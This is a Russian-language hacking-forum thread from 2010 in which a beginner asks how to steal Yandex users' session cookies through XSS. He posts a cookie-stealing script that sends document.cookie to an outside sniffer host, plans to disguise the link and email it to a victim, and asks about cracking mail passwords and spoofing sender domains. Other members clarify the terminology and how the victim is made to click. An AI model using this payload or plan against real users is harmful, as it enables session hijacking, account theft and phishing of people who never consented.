HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS Yandex
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS Yandex
  #1  
Старый 05.05.2010, 02:16
ZeroCold
Новичок
Регистрация: 09.03.2010
Сообщений: 17
С нами: 8513472

Репутация: 0
По умолчанию XSS Yandex
Доброго времени суток.
Собственно первый раз в жизни решил занятся xss развлечениями.

ПРочитал статью xss для начинающих, остаось несколько вопросв которые хотелось задать сообществу.

Вобщем как я понимаю на яндексе искать активны хсс дело не благодарное, поэтому стоит использовать пассивные.
Собственно первый вопрос, правильно ли я понимаю значение смысла слова пассивные - я создаю скрипт перехвата кук
Код:
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
предварителньо запихнув его в какой либо фаил(упс.js)
Затем я делаю линк на этот скрипт, ну и как либо еш шифрую и пердаю жертве. Например почтой.
Теперь вопрос если жертва перейдет по линку я получу куки яндекса жертвы, или я неправильно понимаю смысл слова пассивные?
И еще вопрос, я так понимаю что в коде скрипта надо указать с сылку на снифер т.е. в место
Код:
"http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
надо написать
Код:
"http://мойсайт/путь до снифера/подставной указанный в снифере.gif?"+document.cookie;
</script>
Правильно ли я себе представляю работу пассивной xss уязвимости?
Нужно ли указывать гиф при добавлении кода в ifarame?
Хранятся ли пароли Яндекс почты в куках пусть даже в зашефрованном виде и можно ли их вскрыть? в смысле разгадать.
Можно ли добавить какую либо картинку в тело письма что бы получить подобный эффект, при условии что человек снимет ограничение на загрузку картинок?
И последний вопрос до сих пор осталось возможность отправлять письма с "подставных" доменов, т.е. например с того же вконтакта?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 05.05.2010, 04:36
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию
1. Это активная.
2. На Яндексе паблик xss нету.
 
Ответить с цитированием

  #3  
Старый 05.05.2010, 05:03
Greaves
Новичок
Регистрация: 07.04.2007
Сообщений: 29
С нами: 10049831

Репутация: -8
По умолчанию
3. Активные XSS - http://forum.antichat.ru/thread35802.html Правила читай на вверху же в топе закреплена тема с Хсс.
PS: Ничего сверх естественного ты не нашел - к сожалению ты вообще ничего не нашел.
 
Ответить с цитированием

  #4  
Старый 05.05.2010, 09:56
ZeroCold
Новичок
Регистрация: 09.03.2010
Сообщений: 17
С нами: 8513472

Репутация: 0
По умолчанию
Может я некорректно выразился, но я и не говорил что что либо нашел, я попробую перефразировать.
Я первы раз сталкиваюсь с хсс атакой.
Нашел тучи описаний об активных атаках, собственно вопрос, как выглядят пассивные атаки. т.е.
я так понимаю что если дать линк в письме на xss на другой сайт то кук яндекса мне невидать, правильно я понимаю?
Последний раз редактировалось ZeroCold; 05.05.2010 в 10:11..
 
Ответить с цитированием

  #5  
Старый 05.05.2010, 13:08
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Пассивная XSS, это такая же XSS, как и активная, просто тебе нужно заставить юзера перейти по твоей ссылке с JS кодом и он точно так же выполниться
Последний раз редактировалось Redwood; 05.05.2010 в 14:04..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
xss yandex Iohid Разное - Покупка, продажа, обмен 1 11.10.2009 16:45
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.